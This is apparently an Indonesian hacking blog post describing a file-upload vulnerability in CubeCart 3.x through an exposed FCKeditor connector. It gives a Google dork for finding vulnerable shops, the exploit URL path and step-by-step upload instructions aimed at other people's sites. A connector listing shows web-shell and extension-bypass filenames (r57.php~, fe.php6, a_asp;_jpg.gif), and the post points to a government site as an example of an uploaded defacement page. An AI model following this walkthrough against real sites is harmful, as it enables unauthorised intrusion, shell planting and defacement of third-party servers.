================================================
Autor : ho1onk a.k.a hogyz
email : ho1onk@mail.com
site : http://ho1onk.cz.cc
forum : http://hacker-newbie.org
title : CubeCart v 3.x Upload file Vulnerability
dork : powered by CubeCart v 3.x
================================================
[+] exploit : http://localhost/[pacth]/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html
Ok langsung aja yah..
sesuai judul CubeCart Upload file
buka google
masukkan dork.. terserah mau gimana caranya
salah satu nya adalah
intext:'powered by CubeCart v 3.x'
cari satu per satu,,
nah, kalo udah dapet target kito coba masukin exploit
ne hasil nya
Spoiler for FCK:
Sepp, bisa..
Kita coba upload file *.html
Spoiler for FCK:
1. pada connector pilih PHP
2. lalu pilih file html yang udah kita siapin.. trz klik Upload
Nah tandanya berhasil ato tidah uploadtan kita gini
Lihat SS berikut
FILE UPLOAD WITH NO ERRORS
Spoiler for FCK:
OK, udah berhasil di upload.. tapi file kita dimana ya?
Langsung klik Get folder and files
Kurang lebih seperti ini
Code:
<Connector command="GetFoldersAndFiles" resourceType="File"> <CurrentFolder path="/" url="/[pacth]/file/"/> − <Folders> <Folder name="test"/> </Folders> − <Files> <File name="a_asp;_jpg(1).gif" size="53"/> <File name="a_asp;_jpg.gif" size="53"/> <File name="fe.php6" size="188"/> <File name="robtz.html" size="18"/> <File name="fe.php?" size="188"/> <File name="fe_php." size="188"/> <File name="hn(1).txt" size="1"/> <File name="hn.txt" size="1"/> <File name="r57.php~" size="108"/> </Files> </Connector>
Example : http://site.gov.my/fileupload/file/robtz.html
Spoiler for FCK:
Hasilna :
Spoiler for hasil:
0 komentar:
Posting Komentar